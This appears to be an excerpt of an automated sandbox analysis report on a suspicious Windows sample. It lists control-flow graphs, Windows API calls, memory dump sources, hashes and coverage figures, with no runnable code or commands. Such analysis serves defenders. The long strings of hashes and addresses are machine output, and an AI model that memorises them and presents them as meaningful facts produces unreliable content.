                                                                                                                                                        • Opcode ID: abed105672bdff8296ab4659fb97278ad2abd43eb3546abaaec9500adf6a8c32
                                                                                                                                                        • Instruction ID: a31b67c2d52b48fbe63d55b82c467a81ee602cdd01c2c7b4e462897973e5e992
                                                                                                                                                        • Opcode Fuzzy Hash: abed105672bdff8296ab4659fb97278ad2abd43eb3546abaaec9500adf6a8c32
                                                                                                                                                        • Instruction Fuzzy Hash: 2651CFB1D102099FDF14CFEAD884ADEBFB5BF88314F24852AE919AB210D7709945CF90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1485 129dcb8-129dd1e 1486 129dd29-129dd30 1485->1486 1487 129dd20-129dd26 1485->1487 1488 129dd3b-129ddda CreateWindowExW 1486->1488 1489 129dd32-129dd38 1486->1489 1487->1486 1491 129dddc-129dde2 1488->1491 1492 129dde3-129de1b 1488->1492 1489->1488 1491->1492 1496 129de28 1492->1496 1497 129de1d-129de20 1492->1497 1498 129de29 1496->1498 1497->1496 1498->1498
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0129DDCA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                        • Opcode ID: 85639f9475934b247af30eeca5c78d2170dfc659f8b3737fa0a12c908b5c7fa4
                                                                                                                                                        • Instruction ID: fd63916f29cb482f0c0c7258ec33e4375106a3ccfacbfb5797ae08201893f525
                                                                                                                                                        • Opcode Fuzzy Hash: 85639f9475934b247af30eeca5c78d2170dfc659f8b3737fa0a12c908b5c7fa4
                                                                                                                                                        • Instruction Fuzzy Hash: B141ADB5D10209DFDF14CFEAD884ADEBBB5BF88314F24852AE919AB210D7749845CF90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1499 1296d89-1296d90 1500 1296dfa-1296e94 DuplicateHandle 1499->1500 1501 1296d92-1296dc1 call 12967cc 1499->1501 1506 1296e9d-1296eba 1500->1506 1507 1296e96-1296e9c 1500->1507 1505 1296dc6-1296dec 1501->1505 1507->1506
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01296E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 358db2dfca82990dad8ada38ccaae03516c7df65e19d1c232afee26172f10ede
                                                                                                                                                        • Instruction ID: 49537bc2e035756a2379905ee138456ed64c9859ad4561fcab5e0be3182eea81
                                                                                                                                                        • Opcode Fuzzy Hash: 358db2dfca82990dad8ada38ccaae03516c7df65e19d1c232afee26172f10ede
                                                                                                                                                        • Instruction Fuzzy Hash: DE415976900249AFCF01CF99D844AEEBFF9EF88320F18845AEA54A7311D7759914DFA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1512 1296ebf-1296ecc 1513 1296e79-1296e94 DuplicateHandle 1512->1513 1514 1296ece-1296edb 1512->1514 1515 1296e9d-1296eba 1513->1515 1516 1296e96-1296e9c 1513->1516 1517 1296ee6-1296fee 1514->1517 1516->1515
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01296E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: e52d443edcfb5c47442dc9054b070d2f6c8c2fcfca9ef5600d48563e0190d795
                                                                                                                                                        • Instruction ID: 19828491ab722992c9afedc9b84c19be51f6a1850d1caab6e0dc9ab340b38a5a
                                                                                                                                                        • Opcode Fuzzy Hash: e52d443edcfb5c47442dc9054b070d2f6c8c2fcfca9ef5600d48563e0190d795
                                                                                                                                                        • Instruction Fuzzy Hash: 4D313078E843459FEB509FA4E444B797BA9FB98701F14882AE901873C6DF748816CF10
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1530 1296df8-1296e72 1531 1296e79-1296e94 DuplicateHandle 1530->1531 1532 1296e9d-1296eba 1531->1532 1533 1296e96-1296e9c 1531->1533 1533->1532
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01296E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 967b980564c3873dcd28fb6c789177c0d844d2878ed03c6e896fbf83632b9bda
                                                                                                                                                        • Instruction ID: 5f325e8026358ec244804565d60b7534a102a72e8f10a9e9be387294263de57a
                                                                                                                                                        • Opcode Fuzzy Hash: 967b980564c3873dcd28fb6c789177c0d844d2878ed03c6e896fbf83632b9bda
                                                                                                                                                        • Instruction Fuzzy Hash: C621D2B5D002499FDB10CFAAD484AEEBBF8EB48324F14841AE958A7310C374A955CFA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1536 1296e00-1296e72 1537 1296e79-1296e94 DuplicateHandle 1536->1537 1538 1296e9d-1296eba 1537->1538 1539 1296e96-1296e9c 1537->1539 1539->1538
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01296E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: fd303537104192c035f858de5e5a9c9cf2259c58160d362c31a196208f8eeded
                                                                                                                                                        • Instruction ID: 8893d89fe66d88170e5153b6b8d1ee4820de527f08928c9395281bcaaad2ecbe
                                                                                                                                                        • Opcode Fuzzy Hash: fd303537104192c035f858de5e5a9c9cf2259c58160d362c31a196208f8eeded
                                                                                                                                                        • Instruction Fuzzy Hash: 8621C2B5D002199FDB10CFAAD984ADEBBF8FF48324F14841AE958A3350D374A954CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1550 129c068-129c0b0 1551 129c0b8-129c0e7 LoadLibraryExW 1550->1551 1552 129c0b2-129c0b5 1550->1552 1553 129c0e9-129c0ef 1551->1553 1554 129c0f0-129c10d 1551->1554 1552->1551 1553->1554
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0129BEC9,00000800,00000000,00000000), ref: 0129C0DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        • Opcode ID: 150d82508079469092ef76abb1192b482698d870a2b6423053d5da7b96b9cb82
                                                                                                                                                        • Instruction ID: 5302d5915a6766e0ed48c4005543e4e7dcc60fb244793be8dfeee437d4ab7218
                                                                                                                                                        • Opcode Fuzzy Hash: 150d82508079469092ef76abb1192b482698d870a2b6423053d5da7b96b9cb82
                                                                                                                                                        • Instruction Fuzzy Hash: BB1136B6D002498FDB10CFAAD444ADEFBF4AF88324F14842ED515B7600C375A945CFA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1542 129b000-129c0b0 1544 129c0b8-129c0e7 LoadLibraryExW 1542->1544 1545 129c0b2-129c0b5 1542->1545 1546 129c0e9-129c0ef 1544->1546 1547 129c0f0-129c10d 1544->1547 1545->1544 1546->1547
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0129BEC9,00000800,00000000,00000000), ref: 0129C0DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        • Opcode ID: 79489aba7f4672501c049802106c35e25b7ee1215f1294ed3d91803edad39446
                                                                                                                                                        • Instruction ID: f85c600d3ba30fea9604b74edca94266ff10f36b55fa01ee2cedd32d9fc0c06b
                                                                                                                                                        • Opcode Fuzzy Hash: 79489aba7f4672501c049802106c35e25b7ee1215f1294ed3d91803edad39446
                                                                                                                                                        • Instruction Fuzzy Hash: 5F1103B69002098FDB10CF9AD444BDEFBF8EB89324F14842AE519B7600C7B5A955CFA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1557 129bde8-129be28 1558 129be2a-129be2d 1557->1558 1559 129be30-129be5b GetModuleHandleW 1557->1559 1558->1559 1560 129be5d-129be63 1559->1560 1561 129be64-129be78 1559->1561 1560->1561
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0129BE4E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 816edbda07d02770dacaaab0f9923566043c133b6735cf9aaca2961ac3a161b1
                                                                                                                                                        • Instruction ID: ec1725e165b1775d12f0b036f7788744bd0967fc8ca4df5d6e74ac50f4d3e6a3
                                                                                                                                                        • Opcode Fuzzy Hash: 816edbda07d02770dacaaab0f9923566043c133b6735cf9aaca2961ac3a161b1
                                                                                                                                                        • Instruction Fuzzy Hash: 9611D2B5C006498FDB10CF9AD444BDEFBF8AF88624F14842AD559A7600C375A545CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowLongW.USER32(?,?,?), ref: 0129DF5D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378638983-0
                                                                                                                                                        • Opcode ID: fdbd44a05287d7cd292dbc8b210421a55a5b3b2dc01ea89574c204a18a7d37fe
                                                                                                                                                        • Instruction ID: 0ece1b24354b0fc4e1cfa4572c6530bc5b51866345c3588b5bba001a01ca2f30
                                                                                                                                                        • Opcode Fuzzy Hash: fdbd44a05287d7cd292dbc8b210421a55a5b3b2dc01ea89574c204a18a7d37fe
                                                                                                                                                        • Instruction Fuzzy Hash: D41106B58003499FDB10CF9AD485BDEBBF8EB48324F14845AE918B7741C3B4A944CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowLongW.USER32(?,?,?), ref: 0129DF5D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378638983-0
                                                                                                                                                        • Opcode ID: 3627797b3988ed274b5deef7f45017931dc6e3247d5907bbdec0ddb1624c0bae
                                                                                                                                                        • Instruction ID: 942fbb030cd2376962bee0dfa0d00151fa6502e37d9b673425cf58bfc9245d92
                                                                                                                                                        • Opcode Fuzzy Hash: 3627797b3988ed274b5deef7f45017931dc6e3247d5907bbdec0ddb1624c0bae
                                                                                                                                                        • Instruction Fuzzy Hash: E011E5B58002099FDB10CF99D485BDEBBF8FB48324F14845AE919B7740C3B4A944CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331027177.000000000112D000.00000040.00000001.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_112d000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 94c3168b2b5c26093c5c0914b17cfe0dd315e8b40d24e100518a7c8b58ec72c5
                                                                                                                                                        • Instruction ID: 16094162b30c9a99b1c23037db67b068a0f546e3d79e3412d6581414bb8c22f0
                                                                                                                                                        • Opcode Fuzzy Hash: 94c3168b2b5c26093c5c0914b17cfe0dd315e8b40d24e100518a7c8b58ec72c5
                                                                                                                                                        • Instruction Fuzzy Hash: 09212571504240DFDF09CF94E9C4B66BBB5FB88328F248569E8050B256C376D866CBA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331072187.000000000113D000.00000040.00000001.sdmp, Offset: 0113D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_113d000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2fafb27d46d628dbfe4f1f0b93df2447395f6d79af57f6fd3a47362fe711b1ec
                                                                                                                                                        • Instruction ID: 7a894ac0cdd8d9001f528d98c299f92b7bfe4abd597f71b48c10c6c7fab2fb56
                                                                                                                                                        • Opcode Fuzzy Hash: 2fafb27d46d628dbfe4f1f0b93df2447395f6d79af57f6fd3a47362fe711b1ec
                                                                                                                                                        • Instruction Fuzzy Hash: 4221F571504240DFDF09CFA4E9C4B26BBA5FBC4324F64C96DE8094B24AC736D846CB62
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331072187.000000000113D000.00000040.00000001.sdmp, Offset: 0113D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_113d000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 34dae821e1fa359fe2431fe19e324ede6e1d2e52d1491e31841ab929c8bff432
                                                                                                                                                        • Instruction ID: dbd8fef108de7f57aa6fa698e74b1ad04cd97944e663f7d3d1334403f20fb76c
                                                                                                                                                        • Opcode Fuzzy Hash: 34dae821e1fa359fe2431fe19e324ede6e1d2e52d1491e31841ab929c8bff432
                                                                                                                                                        • Instruction Fuzzy Hash: BC21F171504240DFDF19CFA4E8C4B16FB65FB84A64F64C969E8090B24AC336D846CB62
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331072187.000000000113D000.00000040.00000001.sdmp, Offset: 0113D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_113d000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7fe2ee588b932d395ba957e167d6b65ab593fd110e69af1c84ad019ac7976f93
                                                                                                                                                        • Instruction ID: 031ad6b6c7b258ef34944669255ffd785f538038cf875fbef78f3166f8c4b5d2
                                                                                                                                                        • Opcode Fuzzy Hash: 7fe2ee588b932d395ba957e167d6b65ab593fd110e69af1c84ad019ac7976f93
                                                                                                                                                        • Instruction Fuzzy Hash: E42180754083809FCB06CF64D994B11BF71EB86214F28C5DAD8498F2A7C33AD85ACB62
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331027177.000000000112D000.00000040.00000001.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_112d000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: bfec3cb27130703432ebaa7756116e99e0261673e76136829534a65b319a9084
                                                                                                                                                        • Instruction ID: 27b06b60ff2ef409ca8b8dea8f7c618de8dc982be3c24e9717f74a637a2a8759
                                                                                                                                                        • Opcode Fuzzy Hash: bfec3cb27130703432ebaa7756116e99e0261673e76136829534a65b319a9084
                                                                                                                                                        • Instruction Fuzzy Hash: 3111D376404280CFDF16CF54D5C4B16BF71FB84324F2886A9D9054B65AC33AD46ACBA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331072187.000000000113D000.00000040.00000001.sdmp, Offset: 0113D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_113d000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9208e13c3bd025f0449ca73fc4c5ca3d46b29aae9db9ab7ac54b4ecb103c7ef5
                                                                                                                                                        • Instruction ID: 396cf7634a63462eb593e64188a5838646d688f1b45991f309eac9fa83d68734
                                                                                                                                                        • Opcode Fuzzy Hash: 9208e13c3bd025f0449ca73fc4c5ca3d46b29aae9db9ab7ac54b4ecb103c7ef5
                                                                                                                                                        • Instruction Fuzzy Hash: 5C11BB75904280DFDF06CF54D5C0B15BFA1FB84224F28C6A9D8494B65AC33AD44ACB62
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331027177.000000000112D000.00000040.00000001.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_112d000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 20e7e9b2b3141742622dc26601fba82f1f538631104154e80cc80cfa8763a58c
                                                                                                                                                        • Instruction ID: b5058080c8b6ee36dcfc5a37cc551fe5a807ffc172428618b0a543f3d0c74d92
                                                                                                                                                        • Opcode Fuzzy Hash: 20e7e9b2b3141742622dc26601fba82f1f538631104154e80cc80cfa8763a58c
                                                                                                                                                        • Instruction Fuzzy Hash: 4B01A7715047A09EEB184AA5ECC4BA6FBDCEF51678F08C85AED085B287D37C9444C7B2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331027177.000000000112D000.00000040.00000001.sdmp, Offset: 0112D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_112d000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4241e1d08e58d5e5d2a67c89f928de1ff2c620693d58202fcf49f3893ede017a
                                                                                                                                                        • Instruction ID: ac8d6cbf4736c10e6aaa52ac2a22f51ce70d4bf0ed999c7dd03b30f361d8406d
                                                                                                                                                        • Opcode Fuzzy Hash: 4241e1d08e58d5e5d2a67c89f928de1ff2c620693d58202fcf49f3893ede017a
                                                                                                                                                        • Instruction Fuzzy Hash: CFF062714047949EEB158A59DC84B62FFDCEB51738F18C45AED085F287C3B89844CBB1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.329586339.0000000000922000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.329578739.0000000000920000.00000002.00020000.sdmp Download File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_920000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: bb101154ff17dc3d9cae86c1423bbf92bffb045be676e322249687ccad2106f1
                                                                                                                                                        • Instruction ID: cb22d03999793bb05dbf6b1aa93f9f653ba1d81cc9bbfc6223601828ff6bd382
                                                                                                                                                        • Opcode Fuzzy Hash: bb101154ff17dc3d9cae86c1423bbf92bffb045be676e322249687ccad2106f1
                                                                                                                                                        • Instruction Fuzzy Hash: F8A24F6100F3D24FCB138B785CB56917FB1AE67214B1E49CBD4C1CF0A7E2286A5AD762
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3e647c684c44a9357585ac2932c794530e0ae83ea1edf6afd3cf1a30730265dc
                                                                                                                                                        • Instruction ID: 66156c69694bb191552baa1b5dd9e6b4a2d893d4646604c1687afdd8d3a95f24
                                                                                                                                                        • Opcode Fuzzy Hash: 3e647c684c44a9357585ac2932c794530e0ae83ea1edf6afd3cf1a30730265dc
                                                                                                                                                        • Instruction Fuzzy Hash: 1E5248B1E91707CFD710CF59E8881997BB1FF40328BD04A09D2525BA91EBB4A56BCF48
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.331314484.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_1290000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 33bd33bcf85451653867ad0c691b74e04dc6a563bf3fae56ff95ae4426f06308
                                                                                                                                                        • Instruction ID: c6349c90715b58de1fa8b615bc06ed5cf0d041a500e4dbfa6acb80187cc77e0c
                                                                                                                                                        • Opcode Fuzzy Hash: 33bd33bcf85451653867ad0c691b74e04dc6a563bf3fae56ff95ae4426f06308
                                                                                                                                                        • Instruction Fuzzy Hash: 5EA18132E1021A8FCF05DFA9D9449EEBBF2FF84304B15856AE905BB221DB31E955CB40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:11.1%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:35.1%
                                                                                                                                                        Signature Coverage:6.1%
                                                                                                                                                        Total number of Nodes:738
                                                                                                                                                        Total number of Limit Nodes:14

                                                                                                                                                        Graph

